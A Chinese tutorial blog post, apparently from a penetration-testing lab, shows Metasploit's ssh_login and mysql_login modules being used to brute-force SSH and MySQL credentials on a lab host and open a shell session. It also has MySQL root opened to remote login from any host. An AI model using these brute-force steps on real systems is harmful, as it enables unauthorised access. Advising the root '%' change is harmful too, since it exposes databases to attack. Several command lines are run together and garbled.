msfconsole中ssh_login模块的使用以及使用时MySQL数据库连接不上时的解决办法

本文主要是介绍msfconsole中ssh_login模块的使用以及使用时MySQL数据库连接不上时的解决办法,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

3.ssh_login攻击(ssh_login模块的使用)

3.1搜索ssh_login模块
  search ssh_login搜索模块

3.2进入并使用模块
 use 0(这里0表示前面的编号)

3.3查看需要设置的参数
 show options

yes表示必要设置的参数

no表示可以设置也可以不用设置的参数

3.4 设置RHOSTS参数
 set RHOSTS 192.168.251.139

3.5设置用户名密码的字典
  cd /optlsmkdir dictlscd /dictvim username.txtvim password.txt

3.6设置USER_fILE和 pass_fILE参数
  set uSER_fILE /opt/dict/username.txtset pass_fILE /opt/dict/password.txt这里不区分大小写

我这里仅仅只使用了username.txt,修改一下

3.7 run启动命令
 run

3.8 sessions查看启动成功后创建的session
 sessions

3.9 进入靶机
 sessions -i 1(1表示前面的id)

3.10进入靶机成功后尝试敲一些基础命令验证石佛偶进入靶机
 pwdwhoamiexit

表示进入靶机成功

4.mysql_login攻击(mysql_login模块的使用)

4.1 db_nmap -sP 192.168.251.0/24的用法
  db_nmap -sP 192.168.251.0/24将查询到的结果存入到数据库中

4.2 IP地址查询
 hosts地址查询

4.3 查询地址开放的端口号
  db_nmap -sS 192.168.251.139(IP地址)查询地址开放的端口号并将其写入到数据库中

4.4 将C段结果放入到数据库中
  db_nmap -Pn -sV 192.168.251.139

但是这里出现了报错,经过一系列排查后发现是数据库的原因,是由于数据库没有打开,按照上面开启数据库的办法将数据库打开就ok了

重新运行

出现这个表明运行成功

4.5 使用services查看IP地址所开放的端口
 services

4.6 查询mysql_login 模块
  search mysql_login

4.7 使用模块
 use 0

4.8 show options查询可以修改的参数
 show options

4.9设置密码
 set password 123456789

4.10 设置靶机IP地址
 set rhosts 192.168.251.1

4.11 run运行
 run

这里没有运行成功

排查问题后发现是数据库不能远程连接,为什么连接不上呢?

原因

(1) MySQL建用户的时候会指定一个host,默认是127.0.0.1/localhost只能本机访问;

(2) 其它机器用这个用户帐号访问会提示没有权限

4.12 解决办法
4.12.1 进入MySQL数据库
 mysql -u root -pEnter password:输入你的密码

4.12.2 进入mysql库
 use mysql

4.12.3 查看用户
 select host,user from user;
4.12.4 修改host

修改host原因: %为任意用户都有权限连接,localhost为只能本机连接,配置完host为%这一步就已经能外网访问了

  update user set host='%' where user='root';

4.12.5 修改成功后重新查看数据库信息
 select host,user from user;

修改成功

4.13 再次run运行
 run

4.14 查看数据库里面收集的信息
 creds

这里查询到了我们刚刚对数据库的操作

这篇关于msfconsole中ssh_login模块的使用以及使用时MySQL数据库连接不上时的解决办法的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/797534

相关文章

在Android中使用WebView在线查看PDF文件的方法示例

《在Android中使用WebView在线查看PDF文件的方法示例》在Android应用开发中,有时我们需要在客户端展示PDF文件,以便用户可以阅读或交互,:本文主要介绍在Android中使用We... 目录简介:1. WebView组件介绍2. 在androidManifest.XML中添加Interne

Java Stream流与使用操作指南

《JavaStream流与使用操作指南》Stream不是数据结构,而是一种高级的数据处理工具,允许你以声明式的方式处理数据集合,类似于SQL语句操作数据库,本文给大家介绍JavaStream流与使用... 目录一、什么是stream流二、创建stream流1.单列集合创建stream流2.双列集合创建str

Python使用FastAPI实现大文件分片上传与断点续传功能

《Python使用FastAPI实现大文件分片上传与断点续传功能》大文件直传常遇到超时、网络抖动失败、失败后只能重传的问题,分片上传+断点续传可以把大文件拆成若干小块逐个上传,并在中断后从已完成分片继... 目录一、接口设计二、服务端实现(FastAPI)2.1 运行环境2.2 目录结构建议2.3 serv

Spring Security简介、使用与最佳实践

《SpringSecurity简介、使用与最佳实践》SpringSecurity是一个能够为基于Spring的企业应用系统提供声明式的安全访问控制解决方案的安全框架,本文给大家介绍SpringSec... 目录一、如何理解 Spring Security?—— 核心思想二、如何在 Java 项目中使用?——

springboot中使用okhttp3的小结

《springboot中使用okhttp3的小结》OkHttp3是一个JavaHTTP客户端,可以处理各种请求类型,比如GET、POST、PUT等,并且支持高效的HTTP连接池、请求和响应缓存、以及异... 在 Spring Boot 项目中使用 OkHttp3 进行 HTTP 请求是一个高效且流行的方式。

MySQL的JDBC编程详解

《MySQL的JDBC编程详解》:本文主要介绍MySQL的JDBC编程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录前言一、前置知识1. 引入依赖2. 认识 url二、JDBC 操作流程1. JDBC 的写操作2. JDBC 的读操作总结前言本文介绍了mysq

java.sql.SQLTransientConnectionException连接超时异常原因及解决方案

《java.sql.SQLTransientConnectionException连接超时异常原因及解决方案》:本文主要介绍java.sql.SQLTransientConnectionExcep... 目录一、引言二、异常信息分析三、可能的原因3.1 连接池配置不合理3.2 数据库负载过高3.3 连接泄漏

javacv依赖太大导致jar包也大的解决办法

《javacv依赖太大导致jar包也大的解决办法》随着项目的复杂度和依赖关系的增加,打包后的JAR包可能会变得很大,:本文主要介绍javacv依赖太大导致jar包也大的解决办法,文中通过代码介绍的... 目录前言1.检查依赖2.更改依赖3.检查副依赖总结 前言最近在写项目时,用到了Javacv里的获取视频

Linux下MySQL数据库定时备份脚本与Crontab配置教学

《Linux下MySQL数据库定时备份脚本与Crontab配置教学》在生产环境中,数据库是核心资产之一,定期备份数据库可以有效防止意外数据丢失,本文将分享一份MySQL定时备份脚本,并讲解如何通过cr... 目录备份脚本详解脚本功能说明授权与可执行权限使用 Crontab 定时执行编辑 Crontab添加定

Java使用Javassist动态生成HelloWorld类

《Java使用Javassist动态生成HelloWorld类》Javassist是一个非常强大的字节码操作和定义库,它允许开发者在运行时创建新的类或者修改现有的类,本文将简单介绍如何使用Javass... 目录1. Javassist简介2. 环境准备3. 动态生成HelloWorld类3.1 创建CtC